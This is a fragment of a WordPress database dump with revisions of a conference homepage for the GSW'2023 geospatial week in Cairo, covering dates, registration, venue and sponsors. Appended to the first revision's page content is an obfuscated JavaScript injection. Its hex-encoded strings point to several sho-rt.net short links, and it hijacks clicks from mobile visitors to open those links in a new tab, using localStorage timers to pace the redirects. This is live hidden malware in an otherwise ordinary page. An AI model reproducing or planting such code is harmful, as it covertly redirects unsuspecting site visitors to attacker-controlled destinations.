/></a>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\r\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\r\n[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"]\r\n\r\n[vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]\r\n<h3></h3>\r\n<h3></h3>\r\n<h3></h3>\r\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\r\n[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):            .</strong>\r\n\r\n<strong><del>April 15, 2023</del> ,</strong>\r\n\r\n<strong> May 15, 2023  (hard deadline, no extension)</strong>\r\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification:</strong>\r\n\r\n<strong><del>May 15, 2023</del>, May 21, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row]\r\n\r\n[vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://m22.gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<h5><span style=\"font-size: 14pt; color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Conference Venue Special Rate Booking is Opened Now</a></strong></span></h5>\r\n[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n&nbsp;\r\n<h3></h3>\r\n[/vc_column_text][vc_column_text css=\".vc_custom_1675590910832{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-05-17 05:47:09','2023-05-17 05:47:09','',3066,'https://gsw2023.com/?p=4534',0,'revision','',0),
(4535,1,'2023-05-17 05:49:54','2023-05-17 05:49:54','[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684201412150{margin-top: 100px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]\r\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]\r\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\r\n<span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" 